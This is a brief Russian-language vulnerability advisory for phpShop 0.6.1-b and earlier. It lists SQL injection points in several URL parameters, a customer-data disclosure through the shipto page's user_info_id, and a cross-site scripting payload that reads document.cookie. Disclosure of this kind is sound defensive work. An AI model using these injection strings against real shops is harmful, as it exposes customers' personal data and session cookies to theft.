Программа: phpShop 0.6.1-b и более ранние версии
Несколько уязвимостей обнаружены в phpShop. Удаленный пользователь может внедрить произвольные SQL команды. Удаленный авторизованный пользователь может получить данные клиентов из базы данных. Удаленный пользователь может также выполнить XSS нападение.
1. SQL инъекция:
/?page=[Evil_Query]
/?page=shop/cart&func=cartAdd&product_id=[Evil_Query]
/?page=shop/browse&category_id=&offset=[Evil_Query ]
2. Получении информации о произвольном клиенте (Address Nickname, Company Name, Last Name, First Name, Middle Name, Address, City, State, Zip Code, Country, Telephone, и Fax Number):
/?page=account/shipto&user_info_ id=[Valid User ID]
3. Межсайтовый скриптинг:
/?page=admin/index&GulfTech=">
<script>alert(document.cookie)</script>
Другие примеры смотрите в источнике сообщения.
